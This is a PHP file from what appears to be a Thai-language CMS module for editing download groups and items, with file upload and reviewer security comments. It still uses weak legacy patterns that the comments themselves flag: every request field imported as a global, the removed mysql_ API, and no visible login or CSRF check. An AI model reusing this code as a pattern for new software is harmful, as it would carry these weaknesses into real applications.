<?php

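// Breadcrumb for this page: the parent module's menu name, then the page label.
$navig['load']=$data_name_menu_sub['name'];
$navig['edit_download']="แก้ไขข้อมูล";
navigator($navig);

bar_header($_SESSION['bar_name']); // Bar_Header
fieldset_top($_SESSION['bar_name']);

// SECURITY: import_request_variables() copies every POST and GET field into a
// global named p_<field>, so all of the values below are attacker-controlled.
// With the type string 'pG' the GET value overwrites a POST value of the same
// name. The built-in was removed in PHP 5.4; on a newer runtime this call only
// works if the project supplies its own function of that name.
// NOTE(review): confirm which implementation runs here and whether it adds
// slashes to the imported values.
import_request_variables('pG', 'p_');

// Copy only the expected fields, and only when they are non-empty strings.
// An array-valued field (e.g. id_group[]=x) is ignored instead of being passed
// to trim(). None of the targets are initialised in this file, so when a field
// is absent the later checks read whatever the including script left behind.
// NOTE(review): confirm nothing upstream pre-sets these names.
if (isset($p_id_group) && is_string($p_id_group) && $p_id_group !== "") {
  $id_group = trim($p_id_group);
}
if (isset($p_update_download_g) && is_string($p_update_download_g) && $p_update_download_g !== "") {
  $update_download_g = trim($p_update_download_g);
}
if (isset($p_update_download_gclick) && is_string($p_update_download_gclick) && $p_update_download_gclick !== "") {
  $update_download_gclick = trim($p_update_download_gclick);
}

if (isset($p_id_sub1) && is_string($p_id_sub1) && $p_id_sub1 !== "") {
  $id_sub1 = trim($p_id_sub1);
}
if (isset($p_update_download_s) && is_string($p_update_download_s) && $p_update_download_s !== "") {
  $update_download_s = trim($p_update_download_s);
}
if (isset($p_update_download_sclick) && is_string($p_update_download_sclick) && $p_update_download_sclick !== "") {
  $update_download_sclick = trim($p_update_download_sclick);
}
if (isset($p_topic) && is_string($p_topic) && $p_topic !== "") {
  $topic = trim($p_topic);
}
if (isset($p_download) && is_string($p_download) && $p_download !== "") {
  $download = trim($p_download);
}
if (isset($p_name_group) && is_string($p_name_group) && $p_name_group !== "") {
  $name_group = trim($p_name_group);
}
if (isset($p_download_url) && is_string($p_download_url) && $p_download_url !== "") {
  $download_url = trim($p_download_url);
}

// Client-supplied name of the uploaded file. It is empty on requests that carry
// no 'userfile1' part (the form views and the group form), so guard the index.
$userfile1_name = (isset($_FILES['userfile1']['name']) && is_string($_FILES['userfile1']['name']))
  ? trim($_FILES['userfile1']['name'])
  : "";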


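// ############################################## Save an edited download item (one cms_file row)
// Runs when the item edit form was submitted: updates the row's topic and,
// if a replacement file was uploaded and accepted, its stored file name.
// NOTE(review): no login/permission or CSRF-token check is visible in this
// file; confirm the including script enforces both before this branch runs.
if ($id_sub1 != "" && $update_download_s == "1" && $update_download_sclick == "1") {
  // Request values are escaped before being placed in SQL string literals.
  // mysql_real_escape_string() uses the same default link that mysql_query() uses.
  // NOTE(review): if the request import already adds slashes, strip them first
  // to avoid double escaping; prepared statements (mysqli/PDO) are the better
  // long-term fix, as ext/mysql is removed in PHP 7.
  $id_sub1_sql = mysql_real_escape_string($id_sub1);
  $topic_sql = mysql_real_escape_string(isset($topic) ? $topic : "");

  // File currently recorded for this row. It stays in place unless a
  // replacement is accepted and stored successfully.
  $sql1 = "select files  from cms_file  where id='$id_sub1_sql'";
  $result1 = mysql_query($sql1);
  $data1 = $result1 ? mysql_fetch_row($result1) : false;
  $old_file = ($data1 && $data1[0] != "") ? $data1[0] : "";
  $name1 = $old_file;

  //********************** Was a replacement file uploaded? **********************
  if ($userfile1_name != "") {
    // The stored name is generated server-side so files do not collide; only
    // the suffix is taken from the client-supplied name, via get_file_type().
    $strings = get_file_type($userfile1_name);

    // SECURITY: accept only an allow-listed suffix. The suffix comes from the
    // client, so without this check a server-executable extension could be
    // written into the upload directory. The list below is a constructed
    // example, so adjust it to the document types this module must serve.
    // NOTE(review): also confirm the mainfile directory cannot execute scripts.
    $allowed_ext = array('pdf', 'doc', 'docx', 'xls', 'xlsx', 'ppt', 'pptx', 'zip', 'rar', 'txt', 'jpg', 'jpeg', 'png', 'gif');
    $ext = strtolower(ltrim((string) $strings, '.'));

    $temp_name = $_FILES['userfile1']['tmp_name'];
    if (in_array($ext, $allowed_ext, true) && is_uploaded_file($temp_name)) {
      // Next id value, used as part of the generated name.
      $sqlmax1 = "select max(id+1)  from cms_file";
      $resultmax1 = mysql_query($sqlmax1);
      $datamax1 = mysql_fetch_row($resultmax1);

      // Random part of the name: for uniqueness only, not a secret.
      $str  = "123456789abcdefghijkmnpqrstuvwxyz";
      $pic1 = substr(str_shuffle($str), 0, 9);
      $new_name = "fileupdate$pic1$datamax1[0]$strings";
      $dlink = "$_SESSION[web_name]/mainfile/" . $new_name;

      if (move_uploaded_file($temp_name, $dlink)) {
        $name1 = $new_name;
        // Remove the old file only after the new one is stored, so a failed
        // upload no longer leaves the row pointing at a missing file.
        // basename() keeps a stored value containing "../" from reaching a
        // path outside the upload directory.
        // NOTE(review): assumes stored names never include a sub-directory.
        if ($old_file != "") {
          $old_path = "$_SESSION[web_name]/mainfile/" . basename($old_file);
          if (is_file($old_path)) {
            unlink($old_path);
          }
        }
      }
      // A failed move keeps the previous file name ($name1 is unchanged).
    }
    // A rejected suffix or a non-upload temp path also keeps the previous file.
  }

  // The file name may come back from the database, so it is escaped as well.
  $name1_sql = mysql_real_escape_string($name1);
  $sql = "UPDATE `cms_file` SET `topic` = '$topic_sql', `files` = '$name1_sql'  WHERE `id` = '$id_sub1_sql'";
  $result = mysql_query($sql);
  // The closing tag was misspelled as </enter> before.
  echo"<br><br><center>ข้อมูลได้ถูกแก้ไขแล้ว<br><br></center>";
  echo"<meta http-equiv='refresh' content='1; url=index.php?mod=load&path=load'>";
//  include('coremain/footer.php');
  exit;
}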


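// Show the edit form for a download heading (one cms_file_group row).
// Runs when a group id is given with update_download_g=1 and the form has not
// been submitted yet (update_download_gclick is empty).
if($id_group!="" && $update_download_g=="1" && $update_download_gclick==""){
  // SECURITY: the id comes from the request, so escape it before it goes into
  // the SQL string literal.
  // NOTE(review): prepared statements are the better long-term fix.
  $id_group_sql = mysql_real_escape_string($id_group);
  $sql = "SELECT * FROM cms_file_group  where id_group='$id_group_sql'";
  $result = mysql_query($sql);
  $data = mysql_fetch_array($result);

  // SECURITY: database values are encoded for the context they are printed in,
  // so a stored quote or tag cannot break out of the attribute (stored XSS).
  // The charset argument is omitted so escaping follows the configured
  // default_charset.
  // NOTE(review): confirm default_charset matches the page encoding.
  $form_id_group = urlencode($data['id_group']);                       // URL query value
  $form_name_group = htmlspecialchars($data['name_group'], ENT_QUOTES); // HTML attribute value

  echo"<br><table width='100%' border='0' align='center' cellpadding='1' cellspacing='1' >";
  echo"  <tr  height='20'>";
  echo "<FORM METHOD=POST ACTION='index.php?mod=edit_download&path=load&id_group=$form_id_group&update_download_g=1&update_download_gclick=1'>";
  echo"	 <td width=5%><center><img src='coremain/images/marker.gif'> <b>หัวข้อดาวน์โหลด</b> &nbsp;<INPUT TYPE='text' NAME='name_group' value='$form_name_group' size='35'><br><br>&nbsp;&nbsp;&nbsp;<INPUT TYPE='submit' value='แก้ไขข้อมูล' onmouseover=this.style.cursor='hand'></center></td>";
  echo"</FORM>";
  echo"  </tr>";
  echo"</table>";
}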

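// Show the edit form for a download item (one cms_file row).
// Runs when an item id is given with update_download_s=1 and the form has not
// been submitted yet (update_download_sclick is empty).
if ($id_sub1 != "" && $update_download_s == "1" && $update_download_sclick == "") {
  // SECURITY: the id comes from the request, so escape it before it goes into
  // the SQL string literal.
  // NOTE(review): prepared statements are the better long-term fix.
  $id_sub1_sql = mysql_real_escape_string($id_sub1);
  $sql = "SELECT * FROM cms_file  where id='$id_sub1_sql'";
  $result = mysql_query($sql);
  $data = mysql_fetch_array($result);

  // SECURITY: database values are encoded for the context they are printed in,
  // so a stored quote or tag cannot break out of the attribute (stored XSS).
  // The charset argument is omitted so escaping follows the configured
  // default_charset.
  // NOTE(review): confirm default_charset matches the page encoding.
  $form_id = urlencode($data['id']);                          // URL query value
  $form_topic = htmlspecialchars($data['topic'], ENT_QUOTES); // HTML attribute value

  // multipart/form-data is required so the file field is sent with the POST.
  echo "<FORM METHOD=POST ACTION='index.php?mod=edit_download&path=load&id_sub1=$form_id&update_download_s=1&update_download_sclick=1' enctype='multipart/form-data'>";
  echo"<table width='98%' border='0' align='center' cellpadding='1' cellspacing='1' >";

  echo"  <tr  height='45'>";
  echo"	 <td width=5%></td>";
  echo"	 <td width=25%><img src='coremain/images/marker.gif'> <b>ชื่อไฟล์</b></td>";
  echo"	 <td width='65%'><INPUT TYPE='text' NAME='topic' value='$form_topic' size='35'></td>";
  echo"  </tr>";

  echo"  <tr  height='20'>";
  echo"	 <td></td>";
  echo"	 <td><img src='coremain/images/marker.gif'> <b>Upload File</b></td>";
  echo"	 <td><input name='userfile1' type=file size=35></td>";
  echo"  </tr>";

  button_text('แก้ไขข้อมูล', 'submit', 3);
//  echo"  <tr  height='45'>";
//  echo"	 <td colspan='3' align='center'> <INPUT TYPE='submit' value='แก้ไขข้อมูล' onmouseover=this.style.cursor='hand'></td>";
//  echo"  </tr>";

  echo"</table>";
  echo"</FORM>";
}
// Closes the fieldset opened by fieldset_top() near the top of this file.
fieldset_down();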
?>
